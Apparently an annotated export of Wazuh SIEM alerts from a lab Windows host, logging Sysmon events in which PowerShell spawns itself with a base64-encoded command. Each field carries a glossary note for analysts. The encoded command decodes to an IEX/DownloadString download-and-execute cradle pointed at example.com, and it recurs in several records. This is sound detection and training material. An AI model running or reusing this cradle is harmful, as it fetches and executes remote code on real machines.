data.win.eventdata.processId: 16908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_apqxmac4.3kk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:15.104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 104 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534417.2017814 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:14.9148096Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285823 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:13.227
ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00}
ProcessId: 16908
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00}
ParentProcessId: 16772
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:13.227 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdcd-680a-c90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534418.2025885 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:16.4499482Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2413 Incremental log record number – handy for timeline order.
data.win.system.processID: 11688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:16Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:16Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 105 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534420.2027467 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:17.7648571Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285865 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:16.281
ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00}
ProcessId: 17072
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00}
ParentProcessId: 16908
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:16.281 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 109 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534420.2035538 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:17.9638197Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285866 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:17.951
ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00}
ProcessId: 17072
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_elucagk5.b0x.ps1
CreationUtcTime: 2025-04-24 22:40:17.951
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:17.951 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_elucagk5.b0x.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:17.951 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 106 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534423.2038307 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:20.4605101Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285884 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:19.211
ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00}
ProcessId: 17212
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00}
ParentProcessId: 17072
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
